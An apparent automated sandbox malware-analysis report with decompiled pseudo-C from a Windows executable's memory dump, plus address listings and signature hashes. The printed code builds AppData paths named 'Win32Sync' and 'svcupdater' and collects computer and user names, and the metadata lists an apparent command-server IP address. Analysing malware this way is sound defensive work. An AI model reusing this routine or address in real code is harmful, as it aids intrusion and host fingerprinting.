                                                                                      								 *_t109 = _t217;
                                                                                      								 *(_t109 + 0x10) = _t254;
                                                                                      								 *(_t109 + 0x14) = _t268;
                                                                                      								_t203 = E00414BF0(_t217, _v12, _t254);
                                                                                      								 *((char*)(_t254 + _t217)) = 0;
                                                                                      								return _t203;
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						 *(__ecx + 0x10) = _t254;
                                                                                      						return E00414BF0(__ecx, _t221, _t254);
                                                                                      					}
                                                                                      				}
                                                                                      			}



















































































                                                                                      0x00402830
                                                                                      0x00402830
                                                                                      0x00402830
                                                                                      0x00402831
                                                                                      0x00402833
                                                                                      0x00402836
                                                                                      0x00402837
                                                                                      0x0040283a
                                                                                      0x0040283c
                                                                                      0x0040283f
                                                                                      0x00402842
                                                                                      0x0040284b
                                                                                      0x004028ff
                                                                                      0x00000000
                                                                                      0x00402851
                                                                                      0x00402851
                                                                                      0x0040285b
                                                                                      0x00402872
                                                                                      0x00402873
                                                                                      0x00402876
                                                                                      0x00402879
                                                                                      0x0040287f
                                                                                      0x004028ae
                                                                                      0x004028b0
                                                                                      0x004028b3
                                                                                      0x004028b6
                                                                                      0x004028bc
                                                                                      0x004028c7
                                                                                      0x004028c9
                                                                                      0x004028db
                                                                                      0x004028db
                                                                                      0x004028cb
                                                                                      0x004028d1
                                                                                      0x004028d3
                                                                                      0x004028d6
                                                                                      0x004028d6
                                                                                      0x00000000
                                                                                      0x004028be
                                                                                      0x004028be
                                                                                      0x004028be
                                                                                      0x004028c1
                                                                                      0x004028c3
                                                                                      0x00402904
                                                                                      0x00402904
                                                                                      0x00000000
                                                                                      0x004028c5
                                                                                      0x00000000
                                                                                      0x004028c5
                                                                                      0x004028c3
                                                                                      0x00402881
                                                                                      0x00402886
                                                                                      0x0040288b
                                                                                      0x0040288b
                                                                                      0x0040288e
                                                                                      0x0040288f
                                                                                      0x00402894
                                                                                      0x00402897
                                                                                      0x00402899
                                                                                      0x00402909
                                                                                      0x00402909
                                                                                      0x0040290e
                                                                                      0x0040290f
                                                                                      0x00402910
                                                                                      0x00402911
                                                                                      0x00402913
                                                                                      0x00402919
                                                                                      0x0040291a
                                                                                      0x0040291c
                                                                                      0x0040291f
                                                                                      0x00402926
                                                                                      0x00402927
                                                                                      0x0040292c
                                                                                      0x0040292f
                                                                                      0x00402932
                                                                                      0x00402933
                                                                                      0x00402935
                                                                                      0x00402a5b
                                                                                      0x00000000
                                                                                      0x0040293b
                                                                                      0x0040293b
                                                                                      0x0040293e
                                                                                      0x00402943
                                                                                      0x00402946
                                                                                      0x00402949
                                                                                      0x0040294c
                                                                                      0x0040294e
                                                                                      0x0040297b
                                                                                      0x0040297d
                                                                                      0x0040297f
                                                                                      0x00402981
                                                                                      0x0040298a
                                                                                      0x0040298c
                                                                                      0x0040298e
                                                                                      0x00402991
                                                                                      0x00402991
                                                                                      0x00402994
                                                                                      0x0040299a
                                                                                      0x004029a9
                                                                                      0x004029ab
                                                                                      0x004029bd
                                                                                      0x004029bd
                                                                                      0x004029ad
                                                                                      0x004029ae
                                                                                      0x004029b3
                                                                                      0x004029b6
                                                                                      0x004029b9
                                                                                      0x004029b9
                                                                                      0x00000000
                                                                                      0x0040299c
                                                                                      0x0040299c
                                                                                      0x0040299c
                                                                                      0x0040299f
                                                                                      0x004029a1
                                                                                      0x00402a60
                                                                                      0x00402a60
                                                                                      0x00000000
                                                                                      0x004029a7
                                                                                      0x00000000
                                                                                      0x004029a7
                                                                                      0x004029a1
                                                                                      0x00402983
                                                                                      0x00402983
                                                                                      0x00000000
                                                                                      0x00402983
                                                                                      0x00402950
                                                                                      0x00402950
                                                                                      0x00402952
                                                                                      0x00402957
                                                                                      0x00402957
                                                                                      0x0040295a
                                                                                      0x0040295b
                                                                                      0x00402960
                                                                                      0x00402963
                                                                                      0x00402965
                                                                                      0x00402a65
                                                                                      0x00402a65
                                                                                      0x00402a6a
                                                                                      0x00402a6b
                                                                                      0x00402a6c
                                                                                      0x00402a6d
                                                                                      0x00402a6e
                                                                                      0x00402a6f
                                                                                      0x00402a70
                                                                                      0x00402a71
                                                                                      0x00402a73
                                                                                      0x00402a76
                                                                                      0x00402a79
                                                                                      0x00402a7f
                                                                                      0x00402a80
                                                                                      0x00402a82
                                                                                      0x00402a8b
                                                                                      0x00402a8d
                                                                                      0x00402a8e
                                                                                      0x00402a93
                                                                                      0x00402a96
                                                                                      0x00402a99
                                                                                      0x00402a9c
                                                                                      0x00402a9f
                                                                                      0x00402aa6
                                                                                      0x00402aad
                                                                                      0x00402aae
                                                                                      0x00402ab0
                                                                                      0x00402ab2
                                                                                      0x00402b28
                                                                                      0x00402b2c
                                                                                      0x00402b30
                                                                                      0x00402b33
                                                                                      0x00402b41
                                                                                      0x00402b44
                                                                                      0x00402b4f
                                                                                      0x00402b5b
                                                                                      0x00402ab4
                                                                                      0x00402ab6
                                                                                      0x00402ab9
                                                                                      0x00402abf
                                                                                      0x00402af5
                                                                                      0x00402af7
                                                                                      0x00402afa
                                                                                      0x00402afd
                                                                                      0x00402b02
                                                                                      0x00402b0d
                                                                                      0x00402b0f
                                                                                      0x00402b24
                                                                                      0x00402b24
                                                                                      0x00402b11
                                                                                      0x00402b12
                                                                                      0x00402b17
                                                                                      0x00402b1a
                                                                                      0x00402b1d
                                                                                      0x00402b20
                                                                                      0x00402b20
                                                                                      0x00000000
                                                                                      0x00402b04
                                                                                      0x00402b04
                                                                                      0x00402b04
                                                                                      0x00402b07
                                                                                      0x00402b09
                                                                                      0x00402b5e
                                                                                      0x00000000
                                                                                      0x00402b0b
                                                                                      0x00000000
                                                                                      0x00402b0b
                                                                                      0x00402b09
                                                                                      0x00402ac1
                                                                                      0x00402ac6
                                                                                      0x00402acb
                                                                                      0x00402acb
                                                                                      0x00402ace
                                                                                      0x00402acf
                                                                                      0x00402ad4
                                                                                      0x00402ad7
                                                                                      0x00402ad9
                                                                                      0x00402b63
                                                                                      0x00402b63
                                                                                      0x00402b68
                                                                                      0x00402b69
                                                                                      0x00402b6a
                                                                                      0x00402b6b
                                                                                      0x00402b6c
                                                                                      0x00402b6d
                                                                                      0x00402b6e
                                                                                      0x00402b6f
                                                                                      0x00402b70
                                                                                      0x00402b71
                                                                                      0x00402b73
                                                                                      0x00402b74
                                                                                      0x00402b75
                                                                                      0x00402b78
                                                                                      0x00402b7e
                                                                                      0x00402b80
                                                                                      0x00402c1b
                                                                                      0x00402c1b
                                                                                      0x00402c1b
                                                                                      0x00402b86
                                                                                      0x00402b86
                                                                                      0x00402b8c
                                                                                      0x00402b8e
                                                                                      0x00402bab
                                                                                      0x00402bad
                                                                                      0x00402baf
                                                                                      0x00402bc0
                                                                                      0x00402bc2
                                                                                      0x00402bc4
                                                                                      0x00402bce
                                                                                      0x00402bd8
                                                                                      0x00402be0
                                                                                      0x00402be5
                                                                                      0x00402be9
                                                                                      0x00402bef
                                                                                      0x00402bf1
                                                                                      0x00402c0e
                                                                                      0x00402c0e
                                                                                      0x00402c15
                                                                                      0x00000000
                                                                                      0x00402bf3
                                                                                      0x00402bf6
                                                                                      0x00402bfc
                                                                                      0x00402bfe
                                                                                      0x00000000
                                                                                      0x00402c00
                                                                                      0x00402c00
                                                                                      0x00402c06
                                                                                      0x00402c08
                                                                                      0x00000000
                                                                                      0x00402c0a
                                                                                      0x00402c0a
                                                                                      0x00402c0a
                                                                                      0x00402c08
                                                                                      0x00402bfe
                                                                                      0x00402bc6
                                                                                      0x00402bc6
                                                                                      0x00000000
                                                                                      0x00402bc6
                                                                                      0x00402bb1
                                                                                      0x00402bb1
                                                                                      0x00000000
                                                                                      0x00402bb1
                                                                                      0x00402b90
                                                                                      0x00402b90
                                                                                      0x00000000
                                                                                      0x00402b90
                                                                                      0x00402b8e
                                                                                      0x00402c1d
                                                                                      0x00402c20
                                                                                      0x00402c23
                                                                                      0x00402c4d
                                                                                      0x00402c53
                                                                                      0x00402c25
                                                                                      0x00402c25
                                                                                      0x00402c28
                                                                                      0x00402c29
                                                                                      0x00402c2b
                                                                                      0x00402c31
                                                                                      0x00402c43
                                                                                      0x00402c43
                                                                                      0x00402c45
                                                                                      0x00000000
                                                                                      0x00402c33
                                                                                      0x00402c33
                                                                                      0x00402c36
                                                                                      0x00402c3e
                                                                                      0x00402c41
                                                                                      0x00402c54
                                                                                      0x00402c59
                                                                                      0x00402c5a
                                                                                      0x00402c5b
                                                                                      0x00402c5c
                                                                                      0x00402c5d
                                                                                      0x00402c5e
                                                                                      0x00402c5f
                                                                                      0x00402c60
                                                                                      0x00402c61
                                                                                      0x00402c63
                                                                                      0x00402c65
                                                                                      0x00402c70
                                                                                      0x00402c74
                                                                                      0x00402c79
                                                                                      0x00402c7b
                                                                                      0x00402c7e
                                                                                      0x00402c7f
                                                                                      0x00402c80
                                                                                      0x00402c84
                                                                                      0x00402c8a
                                                                                      0x00402c8c
                                                                                      0x00402c91
                                                                                      0x00402c94
                                                                                      0x00402c9a
                                                                                      0x00402c9c
                                                                                      0x00402cb2
                                                                                      0x00402cb2
                                                                                      0x00402cb7
                                                                                      0x00402cba
                                                                                      0x00402cbc
                                                                                      0x00402cc3
                                                                                      0x00402cc8
                                                                                      0x00402ccf
                                                                                      0x00000000
                                                                                      0x00402c9e
                                                                                      0x00402ca6
                                                                                      0x00402ca8
                                                                                      0x00402caa
                                                                                      0x00402ce0
                                                                                      0x00402ce2
                                                                                      0x00402ce4
                                                                                      0x00000000
                                                                                      0x00402ce6
                                                                                      0x00402ce6
                                                                                      0x00402ce8
                                                                                      0x00402cef
                                                                                      0x00402cf2
                                                                                      0x00402cf9
                                                                                      0x00402cfd
                                                                                      0x00402d00
                                                                                      0x00402d03
                                                                                      0x00402d03
                                                                                      0x00402d05
                                                                                      0x00402d06
                                                                                      0x00402d06
                                                                                      0x00402d0d
                                                                                      0x00402d0e
                                                                                      0x00402d12
                                                                                      0x00402d18
                                                                                      0x00402d1f
                                                                                      0x00402d25
                                                                                      0x00402d27
                                                                                      0x00402d8b
                                                                                      0x00402d91
                                                                                      0x00402d94
                                                                                      0x00402d97
                                                                                      0x00402d9e
                                                                                      0x00402da5
                                                                                      0x00402da7
                                                                                      0x00402dde
                                                                                      0x00402de2
                                                                                      0x00402de5
                                                                                      0x00402dea
                                                                                      0x00000000
                                                                                      0x00402da9
                                                                                      0x00402da9
                                                                                      0x00402daa
                                                                                      0x00402db1
                                                                                      0x00402db6
                                                                                      0x00402db9
                                                                                      0x00402dbc
                                                                                      0x00000000
                                                                                      0x00402dbe
                                                                                      0x00402dbe
                                                                                      0x00402dc1
                                                                                      0x00402dc2
                                                                                      0x00402dc4
                                                                                      0x00402dca
                                                                                      0x00000000
                                                                                      0x00402dcc
                                                                                      0x00402dcc
                                                                                      0x00402dcf
                                                                                      0x00402dd7
                                                                                      0x00402dda
                                                                                      0x00000000
                                                                                      0x00402ddc
                                                                                      0x00000000
                                                                                      0x00402ddc
                                                                                      0x00402dda
                                                                                      0x00402dca
                                                                                      0x00402dbc
                                                                                      0x00402d29
                                                                                      0x00402d29
                                                                                      0x00402d2f
                                                                                      0x00402d34
                                                                                      0x00402d36
                                                                                      0x00402d39
                                                                                      0x00402d3e
                                                                                      0x00402d45
                                                                                      0x00402d4c
                                                                                      0x00402d51
                                                                                      0x00402d54
                                                                                      0x00402d57
                                                                                      0x00402def
                                                                                      0x00402df4
                                                                                      0x00402dfc
                                                                                      0x00402dfd
                                                                                      0x00402e01
                                                                                      0x00402e0b
                                                                                      0x00402d5d
                                                                                      0x00402d5d
                                                                                      0x00402d60
                                                                                      0x00402d61
                                                                                      0x00402d63
                                                                                      0x00402d69
                                                                                      0x00402d7f
                                                                                      0x00402d7f
                                                                                      0x00402d81
                                                                                      0x00000000
                                                                                      0x00402d6b
                                                                                      0x00402d6b
                                                                                      0x00402d6e
                                                                                      0x00402d76
                                                                                      0x00402d79
                                                                                      0x00402e0c
                                                                                      0x00402e0c
                                                                                      0x00402e11
                                                                                      0x00402e12
                                                                                      0x00402e13
                                                                                      0x00402e14
                                                                                      0x00402e15
                                                                                      0x00402e16
                                                                                      0x00402e17
                                                                                      0x00402e18
                                                                                      0x00402e19
                                                                                      0x00402e1a
                                                                                      0x00402e1b
                                                                                      0x00402e1c
                                                                                      0x00402e1d
                                                                                      0x00402e1e
                                                                                      0x00402e1f
                                                                                      0x00402e25
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402d79
                                                                                      0x00402d69
                                                                                      0x00402d57
                                                                                      0x00402d27
                                                                                      0x00402cac
                                                                                      0x00402cac
                                                                                      0x00402cac
                                                                                      0x00000000
                                                                                      0x00402cac
                                                                                      0x00402caa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402c41
                                                                                      0x00402c31
                                                                                      0x00402adf
                                                                                      0x00402adf
                                                                                      0x00402ae2
                                                                                      0x00402ae5
                                                                                      0x00402ae8
                                                                                      0x00402aeb
                                                                                      0x00402b26
                                                                                      0x00402b26
                                                                                      0x00000000
                                                                                      0x00402b26
                                                                                      0x00402ad9
                                                                                      0x00402abf
                                                                                      0x0040296b
                                                                                      0x0040296b
                                                                                      0x0040296e
                                                                                      0x00402971
                                                                                      0x00402974
                                                                                      0x004029bf
                                                                                      0x004029c2
                                                                                      0x004029c8
                                                                                      0x004029cb
                                                                                      0x004029d0
                                                                                      0x004029d3
                                                                                      0x004029d7
                                                                                      0x004029da
                                                                                      0x004029db
                                                                                      0x00402a32
                                                                                      0x00402a33
                                                                                      0x00402a34
                                                                                      0x00402a40
                                                                                      0x00402a4b
                                                                                      0x00402a51
                                                                                      0x00402a58
                                                                                      0x004029dd
                                                                                      0x004029dd
                                                                                      0x004029df
                                                                                      0x004029e0
                                                                                      0x004029e1
                                                                                      0x004029ef
                                                                                      0x004029f7
                                                                                      0x004029fd
                                                                                      0x004029fe
                                                                                      0x00402a01
                                                                                      0x00402a07
                                                                                      0x00402a1b
                                                                                      0x00402a1b
                                                                                      0x00402a1d
                                                                                      0x00402a25
                                                                                      0x00402a2f
                                                                                      0x00402a09
                                                                                      0x00402a09
                                                                                      0x00402a0c
                                                                                      0x00402a0f
                                                                                      0x00402a11
                                                                                      0x00402a14
                                                                                      0x00402a17
                                                                                      0x00000000
                                                                                      0x00402a19
                                                                                      0x00402a19
                                                                                      0x00000000
                                                                                      0x00402a19
                                                                                      0x00402a17
                                                                                      0x00402a07
                                                                                      0x004029db
                                                                                      0x00402965
                                                                                      0x0040294e
                                                                                      0x0040289b
                                                                                      0x0040289b
                                                                                      0x0040289e
                                                                                      0x004028a1
                                                                                      0x004028a4
                                                                                      0x004028dd
                                                                                      0x004028e1
                                                                                      0x004028e4
                                                                                      0x004028e7
                                                                                      0x004028ea
                                                                                      0x004028f2
                                                                                      0x004028fc
                                                                                      0x004028fc
                                                                                      0x00402899
                                                                                      0x0040285d
                                                                                      0x00402860
                                                                                      0x0040286f
                                                                                      0x0040286f
                                                                                      0x0040285b

                                                                                      APIs
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00402904
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                      • String ID: 45.159.189.105
                                                                                      • API String ID: 118556049-662334292
                                                                                      • Opcode ID: b60f8b7c92bfda350d48bb8987b75396e745f4e1ad7af69355adcb5a106e060f
                                                                                      • Instruction ID: 71df9860eed0ca3b424fdc2ea3185412ac39c8c989fabe0bd7de3ce6336b4286
                                                                                      • Opcode Fuzzy Hash: b60f8b7c92bfda350d48bb8987b75396e745f4e1ad7af69355adcb5a106e060f
                                                                                      • Instruction Fuzzy Hash: 53021771A002049BDB149F68D9487AFB7B5EF85310F14423EF815A73D1DBB8DE818BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 63%
                                                                                      			E004041D0(signed int __ebx, void* __edi, void* __esi) {
                                                                                      				struct HINSTANCE__* _v8;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				char _v276;
                                                                                      				char _v532;
                                                                                      				char _v792;
                                                                                      				char _v1052;
                                                                                      				long _v1056;
                                                                                      				struct HINSTANCE__* _v1060;
                                                                                      				struct HINSTANCE__* _v1064;
                                                                                      				signed char _v1080;
                                                                                      				char _v1083;
                                                                                      				signed char _v1084;
                                                                                      				signed char _v1085;
                                                                                      				signed char _v1086;
                                                                                      				signed char _v1087;
                                                                                      				signed int _v1088;
                                                                                      				struct HINSTANCE__* _v1092;
                                                                                      				struct HINSTANCE__* _v1096;
                                                                                      				signed char _v1112;
                                                                                      				struct HINSTANCE__* _v1116;
                                                                                      				struct HINSTANCE__* _v1120;
                                                                                      				signed char _v1136;
                                                                                      				intOrPtr _v1140;
                                                                                      				signed char _v1160;
                                                                                      				intOrPtr _v1164;
                                                                                      				char _v1184;
                                                                                      				signed int _t194;
                                                                                      				signed int _t195;
                                                                                      				intOrPtr _t198;
                                                                                      				intOrPtr _t203;
                                                                                      				intOrPtr _t217;
                                                                                      				void* _t221;
                                                                                      				intOrPtr _t225;
                                                                                      				void* _t231;
                                                                                      				char* _t232;
                                                                                      				intOrPtr _t237;
                                                                                      				void* _t241;
                                                                                      				char* _t242;
                                                                                      				signed char _t248;
                                                                                      				intOrPtr _t254;
                                                                                      				intOrPtr _t263;
                                                                                      				intOrPtr _t266;
                                                                                      				char* _t272;
                                                                                      				signed int _t279;
                                                                                      				signed int _t281;
                                                                                      				signed char _t283;
                                                                                      				signed char _t287;
                                                                                      				signed char _t291;
                                                                                      				intOrPtr _t295;
                                                                                      				signed char _t299;
                                                                                      				signed char _t303;
                                                                                      				signed char _t307;
                                                                                      				signed char _t311;
                                                                                      				signed char _t315;
                                                                                      				signed char _t319;
                                                                                      				signed char _t323;
                                                                                      				signed char _t327;
                                                                                      				intOrPtr* _t332;
                                                                                      				intOrPtr* _t336;
                                                                                      				int* _t337;
                                                                                      				struct HINSTANCE__* _t342;
                                                                                      				intOrPtr _t343;
                                                                                      				intOrPtr* _t345;
                                                                                      				signed char _t353;
                                                                                      				struct HINSTANCE__* _t357;
                                                                                      				struct HINSTANCE__* _t358;
                                                                                      				intOrPtr _t359;
                                                                                      				intOrPtr* _t361;
                                                                                      				signed char _t369;
                                                                                      				struct HINSTANCE__* _t373;
                                                                                      				struct HINSTANCE__* _t374;
                                                                                      				intOrPtr _t375;
                                                                                      				struct HINSTANCE__* _t376;
                                                                                      				int* _t381;
                                                                                      				intOrPtr* _t382;
                                                                                      				intOrPtr* _t385;
                                                                                      				intOrPtr* _t388;
                                                                                      				intOrPtr _t396;
                                                                                      				intOrPtr _t397;
                                                                                      				struct HINSTANCE__* _t398;
                                                                                      				struct HINSTANCE__* _t399;
                                                                                      				intOrPtr* _t401;
                                                                                      				int* _t402;
                                                                                      				int* _t403;
                                                                                      				void* _t404;
                                                                                      				void* _t405;
                                                                                      				void* _t406;
                                                                                      				int* _t407;
                                                                                      				int* _t408;
                                                                                      				void* _t409;
                                                                                      				int* _t410;
                                                                                      				int* _t411;
                                                                                      				void* _t412;
                                                                                      				int* _t413;
                                                                                      				void* _t414;
                                                                                      				void* _t415;
                                                                                      				signed char _t423;
                                                                                      				void* _t429;
                                                                                      				void* _t430;
                                                                                      				void* _t431;
                                                                                      				void* _t444;
                                                                                      				void* _t445;
                                                                                      				void* _t446;
                                                                                      				void* _t450;
                                                                                      				intOrPtr _t451;
                                                                                      				void* _t452;
                                                                                      				void* _t453;
                                                                                      				signed int _t456;
                                                                                      				void* _t457;
                                                                                      				void* _t458;
                                                                                      				void* _t459;
                                                                                      				void* _t460;
                                                                                      				void* _t520;
                                                                                      
                                                                                      				_t331 = __ebx;
                                                                                      				_t454 = _t456;
                                                                                      				_t457 = _t456 - 0x490;
                                                                                      				_t194 =  *0x443048; // 0x9900ec21
                                                                                      				_t195 = _t194 ^ _t456;
                                                                                      				_v20 = _t195;
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				__imp__SHGetFolderPathA(0, 0x1a, 0, 0,  &_v792, _t195, __edi, __esi,  *[fs:0x0], 0x431828, 0xffffffff, _t453);
                                                                                      				asm("xorps xmm0, xmm0");
                                                                                      				_v1064 = 0;
                                                                                      				_t332 =  &_v792;
                                                                                      				_v1060 = 0;
                                                                                      				asm("movups [ebp-0x434], xmm0");
                                                                                      				_t414 = _t332 + 1;
                                                                                      				do {
                                                                                      					_t198 =  *_t332;
                                                                                      					_t332 = _t332 + 1;
                                                                                      				} while (_t198 != 0);
                                                                                      				_push(_t332 - _t414);
                                                                                      				_push( &_v792);
                                                                                      				E00402830(__ebx,  &_v1080, _t414, __edi, __esi);
                                                                                      				_v8 = 0;
                                                                                      				_v1088 = 0x41;
                                                                                      				_v1086 = 0;
                                                                                      				_t336 =  &_v1087;
                                                                                      				_v1087 = 0x5c;
                                                                                      				_v1086 = 0;
                                                                                      				_t415 = _t336 + 1;
                                                                                      				do {
                                                                                      					_t203 =  *_t336;
                                                                                      					_t336 = _t336 + 1;
                                                                                      				} while (_t203 != 0);
                                                                                      				_t337 = _t336 - _t415;
                                                                                      				_t416 = _v1064;
                                                                                      				if(0x7fffffff - _v1064 < _t337) {
                                                                                      					E00401BD0(_t331, _t337, _t416);
                                                                                      					goto L89;
                                                                                      				} else {
                                                                                      					_t219 =  >=  ? _v1080 :  &_v1080;
                                                                                      					L00402A70(_t331,  &_v1160, __edi, 0x7fffffff, _v1056,  &_v1087,  >=  ? _v1080 :  &_v1080, _t416,  &_v1087, _t337);
                                                                                      					_v8 = 1;
                                                                                      					_t221 = E00402760( &_v1112,  &_v1160, "Win32Sync");
                                                                                      					_t458 = _t457 + 4;
                                                                                      					E00405C60(_t331, 0x443aec, _t221);
                                                                                      					_t342 = _v1092;
                                                                                      					if(_t342 < 0x10) {
                                                                                      						L9:
                                                                                      						_v8 = 0;
                                                                                      						_t343 = _v1140;
                                                                                      						_v1096 = 0;
                                                                                      						_v1092 = 0xf;
                                                                                      						_v1112 = 0;
                                                                                      						if(_t343 < 0x10) {
                                                                                      							L13:
                                                                                      							_t416 =  *0x443afc; // 0x28
                                                                                      							_v1088 = 3;
                                                                                      							_v1086 = 0;
                                                                                      							_t345 =  &_v1087;
                                                                                      							_v1087 = 0x5c;
                                                                                      							_v1086 = 0;
                                                                                      							_t444 = _t345 + 1;
                                                                                      							asm("o16 nop [eax+eax]");
                                                                                      							do {
                                                                                      								_t225 =  *_t345;
                                                                                      								_t345 = _t345 + 1;
                                                                                      							} while (_t225 != 0);
                                                                                      							_t337 = _t345 - _t444;
                                                                                      							if(0x7fffffff - _t416 < _t337) {
                                                                                      								goto L90;
                                                                                      							} else {
                                                                                      								_t229 =  >=  ?  *0x443aec : 0x443aec;
                                                                                      								L00402A70(_t331,  &_v1160, _t444, 0x7fffffff, _v1056,  &_v1087,  >=  ?  *0x443aec : 0x443aec, _t416,  &_v1087, _t337);
                                                                                      								_v8 = 2;
                                                                                      								_t231 = E00402760( &_v1112,  &_v1160, "svcupdater");
                                                                                      								_t459 = _t458 + 4;
                                                                                      								_v8 = 3;
                                                                                      								_v1088 = 0x54;
                                                                                      								_v1087 = 0x2c;
                                                                                      								_t353 = _v1088 ^ _v1088;
                                                                                      								_v1083 = 0;
                                                                                      								_v1085 = _t353;
                                                                                      								_t423 = 0x00000031 ^ _t353 ^ _t353;
                                                                                      								_v1086 = _t423;
                                                                                      								_v1084 = _t423;
                                                                                      								_v1083 = 0;
                                                                                      								_t232 = E00402530(_t231,  &_v1087);
                                                                                      								asm("movups xmm0, [eax]");
                                                                                      								asm("movups [ebp-0x46c], xmm0");
                                                                                      								asm("movq xmm0, [eax+0x10]");
                                                                                      								 *(_t232 + 0x10) = 0;
                                                                                      								 *(_t232 + 0x14) = 0xf;
                                                                                      								 *_t232 = 0;
                                                                                      								asm("movq [ebp-0x45c], xmm0");
                                                                                      								E00405C60(_t331, 0x443ad4,  &_v1136);
                                                                                      								_t357 = _v1116;
                                                                                      								if(_t357 < 0x10) {
                                                                                      									L20:
                                                                                      									_v8 = 2;
                                                                                      									_t358 = _v1092;
                                                                                      									if(_t358 < 0x10) {
                                                                                      										L24:
                                                                                      										_v8 = 0;
                                                                                      										_t359 = _v1140;
                                                                                      										_v1096 = 0;
                                                                                      										_v1092 = 0xf;
                                                                                      										_v1112 = 0;
                                                                                      										if(_t359 < 0x10) {
                                                                                      											L28:
                                                                                      											_t416 =  *0x443afc; // 0x28
                                                                                      											_v1088 = 0x10;
                                                                                      											_v1086 = 0;
                                                                                      											_t361 =  &_v1087;
                                                                                      											_v1087 = 0x5c;
                                                                                      											_v1086 = 0;
                                                                                      											_t445 = _t361 + 1;
                                                                                      											do {
                                                                                      												_t237 =  *_t361;
                                                                                      												_t361 = _t361 + 1;
                                                                                      											} while (_t237 != 0);
                                                                                      											_t337 = _t361 - _t445;
                                                                                      											_t449 = 0x7fffffff - _t416;
                                                                                      											if(0x7fffffff - _t416 < _t337) {
                                                                                      												goto L92;
                                                                                      											} else {
                                                                                      												_t239 =  >=  ?  *0x443aec : 0x443aec;
                                                                                      												L00402A70(_t331,  &_v1160, _t445, _t449, _v1056,  &_v1087,  >=  ?  *0x443aec : 0x443aec, _t416,  &_v1087, _t337);
                                                                                      												_v8 = 4;
                                                                                      												_t241 = E00402760( &_v1112,  &_v1160, "svcupdater");
                                                                                      												_t460 = _t459 + 4;
                                                                                      												_v8 = 5;
                                                                                      												_v1088 = 0x74;
                                                                                      												_v1087 = 0x0000001d ^ _v1088;
                                                                                      												_t369 = _v1088 ^ _v1088;
                                                                                      												_v1083 = 0;
                                                                                      												_v1085 = _t369;
                                                                                      												_t428 = 0x00000010 ^ _t369 ^ _t369;
                                                                                      												_v1086 = _t428;
                                                                                      												_v1084 = _t428;
                                                                                      												_v1083 = 0;
                                                                                      												_t242 = E00402530(_t241,  &_v1087);
                                                                                      												asm("movups xmm0, [eax]");
                                                                                      												asm("movups [ebp-0x46c], xmm0");
                                                                                      												asm("movq xmm0, [eax+0x10]");
                                                                                      												 *(_t242 + 0x10) = 0;
                                                                                      												 *(_t242 + 0x14) = 0xf;
                                                                                      												 *_t242 = 0;
                                                                                      												asm("movq [ebp-0x45c], xmm0");
                                                                                      												E00405C60(_t331, 0x443aa4,  &_v1136);
                                                                                      												_t373 = _v1116;
                                                                                      												if(_t373 < 0x10) {
                                                                                      													L35:
                                                                                      													_v8 = 4;
                                                                                      													_t374 = _v1092;
                                                                                      													if(_t374 < 0x10) {
                                                                                      														L39:
                                                                                      														_v8 = 0;
                                                                                      														_t375 = _v1140;
                                                                                      														_v1096 = 0;
                                                                                      														_v1092 = 0xf;
                                                                                      														_v1112 = 0;
                                                                                      														if(_t375 < 0x10) {
                                                                                      															L43:
                                                                                      															if(E00403E40(_t331, _t428, _t445) != 0) {
                                                                                      																L83:
                                                                                      																_t376 = _v1060;
                                                                                      																if(_t376 < 0x10) {
                                                                                      																	L87:
                                                                                      																	 *[fs:0x0] = _v16;
                                                                                      																	_pop(_t446);
                                                                                      																	_pop(_t450);
                                                                                      																	return E0041361E(0, _t331, _v20 ^ _t454, _t428, _t446, _t450);
                                                                                      																} else {
                                                                                      																	_t428 = _v1080;
                                                                                      																	_t381 =  &(_t376->i);
                                                                                      																	_t248 = _v1080;
                                                                                      																	if(_t381 < 0x1000) {
                                                                                      																		L86:
                                                                                      																		_push(_t381);
                                                                                      																		E004138AD(_t428);
                                                                                      																		goto L87;
                                                                                      																	} else {
                                                                                      																		_t416 =  *((intOrPtr*)(_t248 - 4));
                                                                                      																		_t337 =  &(_t381[8]);
                                                                                      																		if(_t248 -  *((intOrPtr*)(_t248 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      																			goto L95;
                                                                                      																		} else {
                                                                                      																			goto L86;
                                                                                      																		}
                                                                                      																	}
                                                                                      																}
                                                                                      															} else {
                                                                                      																GetModuleFileNameA(0,  &_v1052, 0x104);
                                                                                      																_t382 =  &_v1052;
                                                                                      																_t429 = _t382 + 1;
                                                                                      																do {
                                                                                      																	_t254 =  *_t382;
                                                                                      																	_t382 = _t382 + 1;
                                                                                      																} while (_t254 != 0);
                                                                                      																E004080A0(_t331, 0x443abc, _t445,  &_v1052, _t382 - _t429);
                                                                                      																_v1056 = 0xff;
                                                                                      																GetComputerNameA( &_v532,  &_v1056);
                                                                                      																GetUserNameA( &_v276,  &_v1056);
                                                                                      																asm("xorps xmm0, xmm0");
                                                                                      																_v1096 = 0;
                                                                                      																_t385 =  &_v276;
                                                                                      																_v1092 = 0;
                                                                                      																asm("movups [ebp-0x454], xmm0");
                                                                                      																_t430 = _t385 + 1;
                                                                                      																do {
                                                                                      																	_t263 =  *_t385;
                                                                                      																	_t385 = _t385 + 1;
                                                                                      																} while (_t263 != 0);
                                                                                      																_push(_t385 - _t430);
                                                                                      																_push( &_v276);
                                                                                      																E00402830(_t331,  &_v1112, _t430, _t445, _t449);
                                                                                      																_v8 = 6;
                                                                                      																_t388 =  &_v532;
                                                                                      																asm("xorps xmm0, xmm0");
                                                                                      																_v1120 = 0;
                                                                                      																asm("movups [ebp-0x46c], xmm0");
                                                                                      																_v1116 = 0;
                                                                                      																_t431 = _t388 + 1;
                                                                                      																do {
                                                                                      																	_t266 =  *_t388;
                                                                                      																	_t388 = _t388 + 1;
                                                                                      																} while (_t266 != 0);
                                                                                      																_push(_t388 - _t431);
                                                                                      																_push( &_v532);
